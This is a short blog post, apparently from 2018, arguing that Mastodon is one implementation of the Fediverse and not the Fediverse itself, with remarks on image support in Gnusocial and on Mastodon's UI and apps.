I'm not sure if this a lost cause by now. At least I hope that members of my social circle migrate to Fediverse in general, and not to Mastodon from the outset. Of course, the implementation does matter when they make choices. As I mentioned, for anything but Linux discussions, pictures are essential, so one cannot reasonably use a Gnusocial instance for anime, for example. And, I can see some users liking Mastodon's UI. And, Mastodon's native app support is better (or not). So yes, by all means, if you want to install Mastodon, or join an instance that's running Mastodon, be my guest. Just realize that Mastodon is an implementation of Fediverse and not the Fediverse itself.

UPDATE 2019/02/11: Chris finds a silver lining.

October 11, 2018 01:16 PM